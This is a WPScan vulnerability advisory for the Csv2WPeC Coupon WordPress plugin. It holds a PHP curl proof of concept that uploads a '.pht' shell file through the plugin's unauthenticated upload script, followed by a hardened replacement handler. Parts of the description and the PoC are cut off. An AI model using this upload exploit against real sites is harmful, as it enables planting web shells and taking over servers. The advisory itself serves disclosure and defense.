Source: wpvulndb
Author: Larry W. Cashdollar
WPVDB-ID: 0D37BAF3-0884-4E3C-9853-1F4C42A409A3
History: Sep 14, 2015 - 12:00 a.m.

Csv2WPeC Coupon <= 1.1 - Unauthenticated Remote File Upload

wpscan.com

EPSS: 0.003 (Low), percentile 65.6%

The code in csv2wpecCoupon_FileUpload.php does not properly sanitize user input. It checks the file MIME type for x-php, but this check can be tricked when using the short code for

PoC

";
$uploadfile="/var/www/s.pht";
$ch = curl_init("http://192.168.0.47/wp-content/plugins/csv2wpec-coupon/csv2wpecCoupon_FileUpload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('UPLOAD_DIR'=>'/usr/share/wordpress/wp-content/uploads/','OP_TYPE'=>'shell','DATA_KEY'=>1,'shell_file'=>"@$uploadfile",'folder'=>'/usr/share/wordpress/wp-content/uploads/','name'=>'s.pht'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
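A hardened form of the kind of upload handler the advisory describes, as an added example that is not the plugin's code and not from the original page: it gates on authorization, allowlists the extension and sniffed content type, and chooses the directory and filename server-side. The function names, the `coupon_csv` field and the storage path are assumptions.

```php
<?php
declare(strict_types=1);

// Hypothetical storage path outside the web root; never taken from the request
// (the PoC sends UPLOAD_DIR, folder and name as POST fields).
const COUPON_UPLOAD_DIR = '/var/lib/coupon-import';

/** Validate one $_FILES entry; return a server-chosen destination path. */
function coupon_upload_destination(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    // Allowlist the extension rather than blocklisting one MIME type (x-php);
    // the PoC's s.pht is rejected here.
    $ext = strtolower(pathinfo((string)($file['name'] ?? ''), PATHINFO_EXTENSION));
    if ($ext !== 'csv') {
        throw new RuntimeException('only .csv is accepted');
    }
    // Sniff the content server-side; $file['type'] is supplied by the client.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!in_array($mime, ['text/plain', 'text/csv', 'application/csv'], true)) {
        throw new RuntimeException('unexpected content type');
    }
    // A CSV has no reason to contain a PHP open tag (long or short form).
    $data = file_get_contents($file['tmp_name']);
    if ($data === false || strpos($data, '<?') !== false) {
        throw new RuntimeException('file contains a PHP open tag');
    }
    // Server-generated name: the client controls neither directory nor name.
    return COUPON_UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.csv';
}

/** Entry point: authorization first, then validation, then the move. */
function handle_coupon_upload(bool $callerIsAdmin): string
{
    if (!$callerIsAdmin) { // the advisory describes the endpoint as unauthenticated
        throw new RuntimeException('forbidden');
    }
    $dest = coupon_upload_destination($_FILES['coupon_csv'] ?? []);
    if (!move_uploaded_file($_FILES['coupon_csv']['tmp_name'], $dest)) {
        throw new RuntimeException('could not store upload');
    }
    return $dest;
}
```

In a WordPress plugin the `$callerIsAdmin` flag would come from a capability check such as `current_user_can()` together with a nonce check, made inside WordPress rather than in a directly reachable standalone script.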

CPE
Name: csv2wpec-coupon, Operator: eq, Version: *
